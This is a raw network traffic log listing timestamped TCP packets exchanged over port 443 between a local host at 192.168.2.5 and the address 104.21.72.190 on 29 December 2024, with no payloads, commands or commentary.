Dec 29, 2024 09:23:14.677458048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.677495956 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.677505016 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.677536011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.678379059 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.678426027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.678435087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.679022074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.679553032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.679611921 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.682729006 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.682780981 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.683753014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.683809042 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.685348034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.685391903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.686389923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.686434984 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.689497948 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.689555883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.692769051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.692832947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.695929050 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.695991993 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.758105040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.758163929 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.762351036 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.762413025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.762420893 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.762471914 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.850898027 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.850972891 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.854029894 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.854087114 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.857299089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.857359886 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.860435009 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.860488892 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.863617897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.863682985 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.867743015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.867813110 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.870906115 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.870961905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.874097109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.874155045 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.876214981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.876271963 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.877409935 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.877454996 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.878340006 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.878388882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.881550074 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.881603956 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.883747101 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.883809090 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.885700941 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.885757923 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.888542891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.888597012 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.891639948 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.891695023 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.895817041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.895879030 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.958003998 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.958169937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.960544109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.960627079 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.050677061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.050873995 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.050910950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.051635027 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.051707983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.051717043 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.054533958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.054624081 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.054636955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.057385921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.057490110 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.057502031 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.057591915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.059478998 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.059554100 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.061376095 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.061438084 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.063447952 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.063606977 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.064480066 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.064568996 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.066493034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.066592932 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.068619967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.068727016 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.072751999 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.072880030 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.072887897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.073730946 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.073817968 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.073826075 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.076380968 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.076472044 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.076478958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.076554060 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.077522993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.077687025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.081743002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.081880093 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.081887960 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.082058907 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.085367918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.085504055 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.085510015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.088888884 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.088936090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.088946104 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.088954926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.089051008 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.095834017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.095850945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.096169949 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.096178055 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.096385002 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.164772034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.164796114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.164930105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.164962053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.165016890 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.255723000 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.255795002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.255827904 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.255851984 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.255863905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.256026983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.262451887 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.262469053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.262552023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.262568951 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.262578011 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.262600899 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.264554024 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.264626980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.264632940 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.266345978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.266452074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.266457081 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.266665936 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.270216942 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.270349026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.270355940 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.272249937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.272346020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.272351980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.272422075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.273230076 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.273303032 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.277004957 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.277102947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.277108908 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.278934002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.279010057 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.279016018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.279086113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.281006098 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.281276941 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.284080029 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.284177065 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.285772085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.285870075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.288214922 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.288373947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.290126085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.290213108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.294223070 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.294332027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.294337034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.294403076 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.362188101 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.362344980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.362350941 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.366246939 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.366288900 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.366313934 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.366321087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.366345882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.407247066 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.453716993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.454040051 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.456880093 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.456916094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.457175970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.457181931 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.457303047 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.460832119 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.460967064 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.460990906 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.460999012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.464636087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.464669943 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.464675903 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.464700937 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.464945078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.469397068 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.469433069 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.469526052 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.469532013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.469579935 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.473254919 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.473321915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.473328114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.473417997 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.475176096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.475275993 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.477333069 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.477417946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.478622913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.478785038 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.482345104 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.482456923 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.482461929 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.482522964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.483073950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.483149052 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.486793041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.487102032 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.490294933 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.490418911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.490442991 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.490447998 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.490505934 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.494209051 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.494251013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.494273901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.494282961 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.494458914 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.563106060 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.563169003 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.563204050 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.563230991 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.563405037 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.567322016 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.567362070 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.567435026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.567435026 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.567444086 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.610297918 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.658232927 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.658288002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.658314943 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.658344030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.658369064 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.658617020 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.659389973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.659481049 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.662208080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.662317991 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.664968014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.665054083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.667031050 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.667124033 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.671762943 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.671859980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.671874046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.672034979 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.676598072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.676676035 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.676685095 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.676909924 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.678941011 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.679064035 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.683763981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.683804035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.683829069 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.683839083 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.683860064 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.683989048 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.688190937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.688256025 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.688265085 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.688354969 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.692652941 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.692766905 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.692774057 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.692840099 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.697412014 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.697520018 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.697527885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.697593927 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.765851974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.765960932 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.765964031 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.765985012 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.766081095 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.768591881 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.768649101 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.768656969 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.769071102 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.858694077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.858748913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.858791113 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.858827114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.858859062 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.863888025 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.863923073 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.863993883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.863993883 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.864013910 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.867368937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.867414951 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.867571115 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.867571115 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.867579937 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.872313023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.872416973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.872445107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.872452021 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.872483969 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.877034903 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.877067089 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.877130032 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.877130032 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.877140999 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.877182961 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.878985882 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.879240036 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.883910894 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.883963108 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.883991003 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.884000063 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.884032011 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.886702061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.886814117 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.886821032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.889996052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.890286922 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.890295029 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.893835068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.894828081 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.894926071 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:15.894954920 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:15.894961119 CET	443	49709	104.21.72.190	192.168.2.5
